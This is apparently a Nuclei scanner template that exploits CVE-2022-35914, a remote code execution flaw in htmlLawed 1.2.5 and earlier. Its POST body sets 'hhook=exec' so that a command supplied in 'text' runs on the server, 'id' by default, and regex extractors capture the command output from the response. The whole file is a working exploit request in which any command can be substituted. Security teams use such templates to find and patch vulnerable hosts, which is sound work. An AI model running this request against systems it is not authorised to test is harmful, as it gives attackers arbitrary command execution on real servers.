id: htmllawed-rce

info:
  name: htmlLawed 1.2.5 - Remote Code Execution (RCE)
  author: Vulnpire
  severity: high
  description: This template exploits a remote code execution vulnerability in htmlLawed <= 1.2.5.
  reference:
    - https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
    - https://github.com/kesar/HTMLawed
    - CVE-2022-35914

variables:
  cmd: "id"

requests:
  - method: POST
    path:
      - "{{BaseURL}}"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "sid=foo&hhook=exec&text={{cmd}}"
    cookies:
      sid: "foo"
    matchers:
      - type: regex
        part: body
        regex:
          - "&nbsp; \\[[0-9]+\\] =>"
    extractors:
      - type: regex
        part: body
        regex:
          - "&nbsp; \\[[0-9]+\\] => (.*)<br />"
